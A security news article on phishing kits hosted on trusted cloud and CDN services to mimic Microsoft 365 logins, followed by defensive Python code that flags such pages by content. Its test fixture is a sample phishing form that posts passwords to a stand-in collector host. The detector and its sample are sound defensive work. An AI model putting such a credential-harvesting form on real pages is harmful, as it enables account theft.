Security teams are seeing more phishing campaigns delivered through well-known cloud and CDN services rather than suspicious domains.
What happened
Researchers have observed a growing number of phishing campaigns hosted on legitimate cloud and content delivery network platforms, including Google Cloud, Microsoft Azure, and AWS CloudFront. According to Cyber Security News, threat actors are deploying full phishing kits on these services to impersonate Microsoft 365 and other enterprise login pages, making malicious activity harder to detect because the underlying infrastructure is widely trusted.
Going deeper
Unlike traditional phishing operations that rely on newly registered domains, these campaigns operate entirely within established cloud ecosystems. Analysts found that the Tycoon kit was hosted on Microsoft Azure Blob Storage, while Sneaky2FA appeared on Firebase Cloud Storage and AWS CloudFront. Another kit, EvilProxy, used Google Sites to deliver credential harvesting pages. These campaigns often filter out consumer email accounts and focus on corporate credentials, increasing their value to attackers. Because the hosting domains belong to major technology providers, security tools that rely on reputation scoring are less likely to block the traffic. The malicious behavior is embedded in page content and user interaction flows rather than in network indicators.
What was said
Researchers said that cloud-hosted phishing infrastructure changes how defenders must approach detection. Traditional controls that flag unknown domains or recently registered sites are less effective when attackers use well-established platforms. Analysts noted that identifying abuse now requires closer inspection of page behavior, form handling, and authentication prompts. They also warned that enterprise users are at higher risk because these campaigns are designed to look identical to familiar corporate login workflows. Security teams were advised to review how cloud storage and site hosting services are monitored within their environments.
The big picture
Other recent reporting shows how deeply this tactic is taking hold. Cyber Press found that threat actors tied to Chinese hosting infrastructure have built out a network of more than 18,000 active command-and-control servers spread across 48 cloud and hosting providers. The scale matters. Malicious activity is no longer hiding on sketchy domains at the edges of the internet; it’s sitting inside the same cloud platforms many organizations trust every day. As phishing kits and command infrastructure continue to live inside well-known services, security teams are being forced to rethink detection, focusing less on where traffic comes from and more on how those platforms are being abused.
FAQs
Why do attackers prefer cloud platforms for phishing?
Cloud services provide trusted domains, reliable uptime, and easy deployment, which helps phishing pages avoid early detection.
Why are these attacks harder to block?
Security tools often treat traffic from major cloud providers as legitimate, and the malicious activity is contained in the page content rather than the domain itself.
Which users are most often targeted?
Many campaigns focus on enterprise accounts, especially Microsoft 365 users, because corporate credentials can provide broader access.
What controls can help detect cloud-hosted phishing?
Behavioral analysis, identity protection, user interaction monitoring, and inspection of authentication workflows are more effective than domain checks alone.
Can cloud providers stop this abuse?
Providers can remove reported malicious content, but attackers often redeploy quickly, so organizations still need internal detection and response measures.
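As an added illustration of the content-based inspection the researchers and the FAQ describe (this is example code, not from the article or the cited reports), the Python below scores a fetched page by what it contains rather than by host reputation: a Microsoft-branded credential form, where that form posts, and whether the page sits on a shared cloud or site-hosting domain. The host suffix lists, brand strings and sample page are assumptions constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed list of shared cloud storage / site-hosting suffixes named in the article.
CLOUD_HOST_SUFFIXES = ("blob.core.windows.net", "cloudfront.net",
                       "firebasestorage.googleapis.com", "sites.google.com")
# Assumed hosts where a genuine Microsoft 365 form may post credentials.
LEGIT_LOGIN_HOSTS = ("login.microsoftonline.com", "login.live.com", "login.microsoft.com")
BRAND_HINTS = ("sign in to your account", "microsoft 365", "office 365", "microsoft")

def _host_matches(host, suffixes):
    # Exact or dot-separated suffix match, so "evilcloudfront.net" does not count.
    return any(host == s or host.endswith("." + s) for s in suffixes)

class _FormScanner(HTMLParser):
    """Collect form actions, password inputs and visible text from the page."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password, self.text = [], False, []
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        if tag == "input" and a.get("type", "").lower() == "password":
            self.has_password = True
    def handle_data(self, data):
        self.text.append(data.lower())

def assess_page(page_url, html):
    """Return (verdict, reasons) based on page content, not domain reputation."""
    host = urlsplit(page_url).hostname or ""
    scanner = _FormScanner()
    scanner.feed(html)
    text = " ".join(scanner.text)
    reasons = []
    if _host_matches(host, CLOUD_HOST_SUFFIXES):
        reasons.append(f"served from shared cloud host {host}")
    branded_form = scanner.has_password and any(h in text for h in BRAND_HINTS)
    if branded_form:
        reasons.append("Microsoft-branded credential form on the page")
    for action in scanner.actions:
        # A relative action posts back to the page's own host.
        target = urlsplit(action).hostname or host
        if scanner.has_password and not _host_matches(target, LEGIT_LOGIN_HOSTS):
            reasons.append(f"password form posts to {target}")
    verdict = "suspicious" if branded_form and len(reasons) >= 2 else "benign"
    return verdict, reasons

# Constructed sample page, not a real kit: branded login form on Azure Blob Storage.
SAMPLE_URL = "https://example123.blob.core.windows.net/$web/index.html"
SAMPLE_HTML = """<html><body><h1>Sign in to your account</h1>
<form action="https://collector.example/post.php" method="post">
<input type="email" name="loginfmt"><input type="password" name="passwd">
</form></body></html>"""
```

Running `assess_page(SAMPLE_URL, SAMPLE_HTML)` returns "suspicious" with three reasons, while the same form on a genuine Microsoft login host posting to itself returns "benign".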